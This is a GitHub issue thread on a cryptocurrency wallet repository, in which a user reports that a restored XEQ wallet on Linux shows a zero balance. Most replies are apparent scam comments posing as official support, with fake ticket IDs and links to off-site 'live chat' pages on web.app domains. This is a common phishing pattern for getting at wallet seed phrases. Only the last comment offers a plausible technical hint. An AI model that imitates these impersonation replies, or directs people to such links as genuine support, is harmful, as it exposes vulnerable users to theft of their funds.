### ISSUE TITLE
LINUX WALLET NOT DISPLAYING BALANCE

### ISSUE THREAD

**Issue by CryptoHypno** [EquilibriaCC/equilibria-wallet#32]
Hi guys!

Hope you can assist me even though I'm not a 'techie'?

Recently switched my OS to Linux Zorin therefore wanted to restore my XEQ wallet from seed phrase.

Downloaded the app-image and installed on my laptop. Wallet opened really quickly and I restored wallet with seed phrase and continued with Local + Remote Daemon setting.

Daemon 100%. 1474942/1474942

STATUS: SCANNING

At 762000 my first transaction balance appears from over 2 years ago.

At 820000, the balance disappears never to be seen again. 

My second transaction, again from 2 years ago never shows in balance, Balance is still 0.

Wallet scanned 100%. 1474942/1474942

STATUS: READY

Balance still 0.

I have re-scanned wallet - still 0 balance and my first transaction balance does not appear as before.

Uninstalled wallet; reinstalled wallet - balance still 0. Same behaviour of my first transaction balance appearing and then disappearing.

Now, on re-scanning, wallet is stuck on 99.9%.

Any advice would be gratefully received.

Many thanks in advance.

![Screenshot from 2024-12-31 11-11-42](https://github.com/user-attachments/assets/5e7787cb-3065-411a-962e-4dd247d57cf8)

[wallet-rpc.log](https://github.com/user-attachments/files/18281357/wallet-rpc.log)

**Describe the bug**

**To Reproduce**
Steps to reproduce the behaviour:

**Expected behaviour**

**Screenshots**

**Desktop (please complete the following information):**

**Smartphone (please complete the following information):**

**Log File**
Attach Equilibrium.log

**Additional context**

**Comment by Brett090** [comment]
@CryptoHypno 
Hi there,

We use GitHub issues as a place to track bugs and other development-related issues. 

Please see the link below to our dedicated support line:

[Help Center :  Click Here](https://livechatsupports.app/github)

Ticket ID: WB240

Note: Click on the live chat icon at the bottom corner of the page to start a conversation.

**Comment by berryMo27** [comment]
For the quickest resolution to your issue, we highly recommend using our live chat support, available 24/7. Our dedicated support team can provide real-time assistance and help resolve your complaint promptly. You can access the live chat here: [Equilibria Wallet SUPPORT](https://dapp-exploreonsite.web.app/).

If live chat is unavailable or you prefer to continue via email, please rest assured that our team will review your ticket and follow up with you as soon as possible.

**Comment by Justin-skies** [comment]
Hello @CryptoHypno  A support ticket has been opened for you. Kindly Talk to Support on the [Live support page](https://crypto-onlinrectifications.web.app/) so that your issue can be looked into. [CLICK HERE](https://crypto-onlinrectifications.web.app/)

**Comment by Berge511** [comment]
> Hi guys!
> 
> Hope you can assist me even though I'm not a 'techie'?
> 
> Recently switched my OS to Linux Zorin therefore wanted to restore my XEQ wallet from seed phrase.
> 
> Downloaded the app-image and installed on my laptop. Wallet opened really quickly and I restored wallet with seed phrase and continued with Local + Remote Daemon setting.
> 
> Daemon 100%. 1474942/1474942
> 
> STATUS: SCANNING
> 
> At 762000 my first transaction balance appears from over 2 years ago.
> 
> At 820000, the balance disappears never to be seen again.
> 
> My second transaction, again from 2 years ago never shows in balance, Balance is still 0.
> 
> Wallet scanned 100%. 1474942/1474942
> 
> STATUS: READY
> 
> Balance still 0.
> 
> I have re-scanned wallet - still 0 balance and my first transaction balance does not appear as before.
> 
> Uninstalled wallet; reinstalled wallet - balance still 0. Same behaviour of my first transaction balance appearing and then disappearing.
> 
> Now, on re-scanning, wallet is stuck on 99.9%.
> 
> Any advice would be gratefully received.
> 
> Many thanks in advance.
> 
> ![Screenshot from 2024-12-31 11-11-42](https://private-user-images.githubusercontent.com/161032807/399461267-5e7787cb-3065-411a-962e-4dd247d57cf8.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzU2NTQzMTIsIm5iZiI6MTczNTY1NDAxMiwicGF0aCI6Ii8xNjEwMzI4MDcvMzk5NDYxMjY3LTVlNzc4N2NiLTMwNjUtNDExYS05NjJlLTRkZDI0N2Q1N2NmOC5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQxMjMxJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MTIzMVQxNDA2NTJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT02MTllNGJhNWFiZWFiYmNkNTNiZmJhOGRlNTkzZmRmZTQ2NjBkMzBiYzQ4ZDQ4NTZkYTVmZmYzMGQzN2JjMzNlJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.jZXVjBoH7Tb6vmHI24LZ7LGT-FaQ6IFvzC0mGAow5nI)
> 
> [wallet-rpc.log](https://github.com/user-attachments/files/18281357/wallet-rpc.log)
> 
> **Describe the bug** A clear and concise description of what the bug is.
> 
> **To Reproduce** Steps to reproduce the behaviour:
> 
> 1. Go to '...'
> 2. Click on '....'
> 3. Scroll down to '....'
> 4. See error
> 
> **Expected behaviour** A clear and concise description of what you expected to happen.
> 
> **Screenshots** If applicable, add screenshots to help explain your problem.
> 
> **Desktop (please complete the following information):**
> 
> * OS: [e.g. iOS]
> * Browser [e.g. chrome, safari]
> * Version [e.g. 22]
> 
> **Smartphone (please complete the following information):**
> 
> * Device: [e.g. iPhone6]
> * OS: [e.g. iOS8.1]
> * Browser [e.g. stock browser, safari]
> * Version [e.g. 22]
> 
> **Log File** Attach Equilibrium.log
> 
> **Additional context** Add any other context about the problem here.

Hello @CryptoHypno  A support ticket has been opened for you. Kindly Talk to Support on the [Live support page](https://crypto-onlinrectifications.web.app/) so that your issue can be looked into. [CLICK HERE](https://crypto-onlinrectifications.web.app/)

**Comment by ArqTras** [comment]
You need binaries from release 
https://github.com/EquilibriaCC/Equilibria/releases/download/v22.0.0/build-depends-windows-x64.zip
 And replace daemon and wallet-rpc
